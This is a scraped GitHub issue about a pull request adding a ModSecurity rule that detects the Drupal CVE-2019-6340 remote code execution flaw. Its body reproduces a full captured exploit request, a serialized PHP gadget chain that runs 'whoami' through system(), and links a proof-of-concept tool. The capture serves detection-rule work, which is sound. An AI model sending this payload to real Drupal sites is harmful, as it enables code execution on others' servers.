adding rule for Drupal CVE-2019-6340
See original GitHub issue_Issue for tracking original pull request created by user d1vious on date 2019-03-02 02:12:41. Link to original PR: https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/1315._
HEAD is: 8b58c08d3cc266cfdb83c6776b6abbd21aba6d40 BASE is: f060b4369090db0e1c1341870e7e68b5bc40efda Used the following modified POC tool to test it https://gist.github.com/d1vious/9d798d4f50d6d887f1babcb82f5e3559 still need to build a unit test for it. Here an example payload from the attack
GET /node/3?_format=hal_json HTTP/1.1
Host: 192.168.86.76
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/hal+json
Content-Length: 583
20:18:28.762332 IP 192.168.86.77.37584 > 192.168.86.76.80: Flags [P.], seq 225:808, ack 1, win 229, options [nop,nop,TS val 615012830 ecr 1128184318], length 583: HTTP
E..{ev@.@.....VM..VL...PO.. ..rB....N>.....
$.Y.C>..{"link": [{"value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:18:\"echo ---- & whoami\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"}], "_links": {"type": {"href": "http://192.168.86.76/rest/type/shortcut/default"}}}
And the matching logs in JSON https://jsoneditoronline.org/?id=8e756fa3f4e34b20b13756d04df78690
Issue Analytics
- State:
- Created 3 years ago
- Comments:5 (3 by maintainers)
Top Results From Across the Web
Drupal Core Remote Code Execution Vulnerability: CVE-2019 ...
CVE-2019–6340 is an unauthenticated remote code execution flaw in Drupal 8's REST API module, which affects websites with Drupal REST API ...
Read more >Drupal Vulnerability Can Be Exploited for RCE Attacks
The content management framework Drupal recently fixed a vulnerability (CVE-2019-6340) in their core software, identified as SA-CORE-2019-003.
Read more >Creating rules | Basic usage - Drupal
Access the "Rules" tab at the Business Rules page and click on "Add Rule" button. Then select the appropriated Event type and click...
Read more >Cve 2019 6340 drupal : r/immersivelabs - Reddit
Cve 2019 6340 drupal. Hi I have answered q2 and got the token. But can't get q1. What is the password Drupal uses...
Read more >Critical Drupal Vulnerability Allows Remote Code Execution
Updates released for the Drupal CMS patch a “highly critical” vulnerability that can be exploited for remote code execution (CVE-2019-6340).
Read more >Top Related Medium Post
No results found
Top Related StackOverflow Question
No results found
Troubleshoot Live Code
Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start FreeTop Related Reddit Thread
No results found
Top Related Hackernoon Post
No results found
Top Related Tweet
No results found
Top Related Dev.to Post
No results found
Top Related Hashnode Post
No results found
Top GitHub Comments
still active, please keep open
This issue has been open 120 days with no activity. Remove the stale label or comment, or this will be closed in 14 days